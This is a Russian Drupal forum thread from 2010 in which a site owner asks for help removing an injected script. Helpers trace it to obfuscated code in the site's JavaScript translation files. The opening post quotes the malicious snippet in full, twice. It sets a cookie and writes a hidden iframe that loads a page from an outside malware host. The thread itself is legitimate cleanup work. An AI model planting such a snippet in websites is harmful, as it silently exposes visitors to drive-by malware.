20 февраля 2010 в 17:23
Несколько дней назад обнаружила в head вот такой скрипт:
<script>
if (document.cookie.search("cdx=7") == -1) {
2ifbt=document.getElementById('kiew');if(ifbt==null){document.write('<iframe id=kiew src=http://www.bulanda.eu/Ged/xmlrpc.php style=display:none></iframe>');}
3document.cookie = "cdx=7;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}
</script>
if (document.cookie.search("cdx=7") == -1) {
2ifbt=document.getElementById('kiew');if(ifbt==null){document.write('<iframe id=kiew src=http://www.bulanda.eu/Ged/xmlrpc.php style=display:none></iframe>');}
3document.cookie = "cdx=7;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}
</script>
Ничего в них не понимаю, но его там явно быть не должно. Перелопатила весь сайт, перезалила сам друпал и все модули...все бестолку. Посмотрела в firebug, но именно у этого скрипта нет src или еще каких-то способов определить, откуда он там взялся. Помогите разобраться, пожалуйста
Комментарии
вирус у вас, поищите по сайту, таких топиков было уже туча
Я честно перечитала половину этого сайта, но...может ищу не так? Простите чайника )
Меняйте фтпшку и все пассворды. Попробуйте перезалить после тщательной проверки пк все стандартные файлы двигла и модулей
О том и речь, что все это было проделано. Причем дважды... Спрятали куда-то эту заразу хорошо.
Комп не проверяла - у меня линукс.
Грешу все же на стыренный пароль, т.к. приходилось несколько раз работать из под винды...видимо там его и уперли. Но сейчас-то такого не должно быть.
Вопрос в том, КУДА этот вирус спрятали?
Может дело в том, что вы из старого дистрибутива восстановили "поправленный" файл? Попробуйте смотреть модули и тему. Возможно ответ кроется ближе, чем кажется
Скачала все с друпал.орг и сразу залила себе, ничего старого нет. Тему вот еще раз проверю, у меня она не "оригинальная".
index.php посмотрите. Ну и на засыпку:
http://filezilla.ru/
http://www.freedrweb.com/cureit/ - для винды
Спасибо, но у меня не винда ))
А вообще Вам надо искать контейнер(див таблица параграфф и т.д.) с id kiew. Найдете его - найдете корешки.
Хитрость может крыться в другом JS, который при загрузке создает это контейнер, а уже после его выполнения туда другим скриптом встраивается iframe.
Еще стоит искать подозрительный код в виде eval(base64). Туда можно прописать что угодно.. Для анализа потребуется декодер - если поищите внимательнее, то в сети они есть
То ли я слепая, то ли все не так просто - нет ничего, хоть тресни (((
Дайте ссылку: посмотреть хоть между каких тегов бяка дислоцируется
aguzarova.info
Внимание! Посещение этого сайта может нанести вред вашему компьютеру.
Веб-сайт по адресу aguzarova.info содержит элементы сайта какаточкаеу, где, вероятно, размещено вредоносное ПО – программа, которая может нанести вред вашему компьютеру или выполять действия без вашего согласия. Ваш компьютер может быть заражен просто при посещении сайта, на котором размещена вредоносная программа.
Более подробную информацию о неполадках с этими элементами можно найти на странице Google Страница диагностики безопасного просмотра для домена ....
xD
Включите плиз ..
Забавная бодяга .. Из под гостя не видно нигде.
Его только firebug'ом видно...причем везде. И гостем тоже.
Зайдите в папку юзерских скриптов фокса. Я не знаю как оно на *nix'ах устроено, но возможно ответ где-то там, ибо у меня со всех браузеров всё чисто. Поискал по скриптам - те что сверху - тоже чисто.
Кстати ... Оно наверное вот оттуда и инклюдится как-то. хттп://www.bуlanдa.eu/Ged/xmlrpc.php
Что у вас на пинге висит? Смотрите внимательнее все внешние связки
Так, это уже сложно для моего чайникового понимания... особенно вторая половина. Можно немного поподробнее?
Кароче огнепопый лис козырен своими примочками для расширения функционала. Возможно, у Вас стоит какой-то юзерскрипт, который этот фрейм и встраивает.
Пинг это модуль, который через xmlrpc уведомляет другие сайты об обновлении вашего. Я бы в этих двух направлениях копал
Весь вечер курила маны и возникло два вопроса:
- если бы файрфокс что-то встраивал, разве он может это сделать на сервере? Скрипт же не только на моем компе вылезает. Изначально его вообще яндекс нашел.
- с уведомлением других сайтов тоже не очень понятно... Скрипт не исчезает ни на секунду, сколько бы я не перезаливала и сам друпал, и модули. Пароль уже сто раз поменян.
Не сохраняйте пароли на ФТП в программах.
Может соседний сайт сломали или весь хостинг, поэтому сколько не перезаливай результат такой же.
Насчёт "компьютер точно чистый".Был у меня анекдотичный случай:
Я сидел тогда на 3G,там специальный модем дают.Начал замечать,что сильно жрёт траффика - буквально за несколько дней уходило гига 3,причём всё более исходящий. Проверялся всем чем только мог,включая лицензионный Каспер - антивирусы как-то странно висли, показывали каких-то червей,но сделать ничего не могли. Форматировал винт раз 5, с полной затиркой ноликами винта (есть такая утилита) Эффекта - 0. Опытным путём,при помощи Нортона, удалось выяснить, что рассылается спам. Оказалось, дело было в модеме - там есть флэш память, там и сидел вирус. Купил новый модем
И что бы вы посоветовали чайнику-блондинке? ))
Это наверное дурацкий вопрос, но мне одна небезызвестная особа выносит мозг из-за этого сайта, так что даже остатки соображалки уже не работают ((
Могут вставлять скрипт дополнения к браузеру, выключите все дополнения, или переустановите браузер.
У меня по-прежнему тот же вопрос - в какой момент браузер может вставить скрипт? Если я правильно понимаю, то он его может вписать только на моей стороне, то есть в уже загруженную страницу, а не на сервере. Но скрипт то вылезает не только на этом компе... Разве не так? У меня из дополнений только firebug и стоит собственно.
А чего о хостинге никто вопрос не поднимает? Все разы, что мне сайты дефейсили и «инфреймили», каждый раз была дыра со стороны хостера, не смотря на все его заявления в обратном.
Да у хостера всегда отмазка "У меня Unix и вирусов быть не может"
На каждого хитрожопого хостера есть логи с правильной резьбой.
На каждого хитрожопого хостера нужен не менее житрожопый клиент. У меня к сожалению данная черта отсутствует (( И в любом случае, прежде чем приставать к хостеру, надо убедиться, что это не с моей стороны проблемы (с головой).
Так к хостеру можно не только «приставать», а просто обратиться по человечески за помощью. Маловероятно, что на drupal.ru вы на свой вопрос получите исчерпывающий ответ, слишком специфична тема безопасности и ее нарушения.
Мир не без добрых людей
Огромное спасибо RxB )))
Что было-то? Расскажите хоть
Вирус нашелся в файлах перевода для скриптов, т.е в каталоге sites/default/files/languages
Ух ты.
И чета я механизма этого подлого действия не пойму. Как парсер PO-файлов мог пропустить тег скрипта? Если пропустил, то это означает большой и грязный камень в лицо безопасности самого двига.
Пардон, я не знаю... Я сразу предупредила, что в кодах почти ничего не понимаю *йа_блондинко*
Все модули и прочее я беру только с друпал.орг (если мне память не изменяет). В принципе ничего экзотического у меня не стоит. RxB объяснил так:
"А хостер реально странный. Не исключено что через него это и было сделано.
В language-файлах должна быть только одна строка, по типу:
Drupal.locale = { 'pluralFormula':....
Ключевое слово Drupal, у вас после был код вида:
var source = 'iuy7iHUI&T&TGOPUJPGJCFTHDYRDIUPILJKPYJDYDUGO8uyp9uj[up9' и т.п
Потом это дело по циклу шло и дешифровывалось.
Потом document.write()
Наличие такой херни, даёт повод для сомнений".
Хостер r01.ru, если это кому-то интересно.
хм...
ну да фиг с ним, поздравляю с излеченьцем
Ну вообще да, забавно
Прикиньте, если eval(function(p,a,c,k,e,r) или eval(function(p,a,c,k,e,d) ? Там тоже так просто не посмотреть...
В Drupal не так уж и много скриптов с eval() и уж тем более с document.write()
Если пропустил, то это означает большой и грязный камень в лицо безопасности самого двига.
Это скорее угроза более стрёмная и масштабная. Напишу сейчас полезный модуль, засуну в него что-то интересное и половина пользователей даже подозревать ничего не будет. А засунуть реально можно что угодно...
Чего вы кипеш поднимаете? Вроде никто не говорил, что через .po-файлы произошло заражение.
Если включить логическое мышление в тыковке, то получается:
Пришёл злой скрипт, либо через ФТП, либо от соседей, добавил свой код во ВСЕ js-файлы. На сайт начали ругаться антивирусы, это увидела Жанна Агузарова и тоже начала ругаться, но на марсиан. Начала доставать ТС. ТС, взяла и заменила файлы резервной копией, все скрипты кроме динамически-генерируемых, вроде JS-файлов перевода, естественно заменились чистыми.
Так чего раньше скромничал? Примерно этих объяснений и ждали.
Не так было ))) Антивирусы молчали, возмущался только яндекс. А Жанна возмущалась, что сайт закрыт, потому что ТС (это звучит гордо)) испугалось, что заразится кто-то из пользователей.
Впрочем это наверное не существенно ))
Потому что в ваше сопле-жуйство влазить не хотел. По расположению вредоносного скрипта было сразу видно откуда он идёт
Чего вы кипеш поднимаете?
Виктор, я не поднимал кипеш, я всего-лишь констатировал очевидное (:
И в чем причины хамства? Был озвучен конкретный вопрос, на него ожидался конкретный вопрос. Мне дохера чего видно из окна своего, однако ж претензий, что этого не видят другие никому предъявлять не стану. Чего, собсно, и от других ожидаю.
Это я неудачно квотировал
Ну вот и продолжай наблюдать, я тебе вроде не мешаю.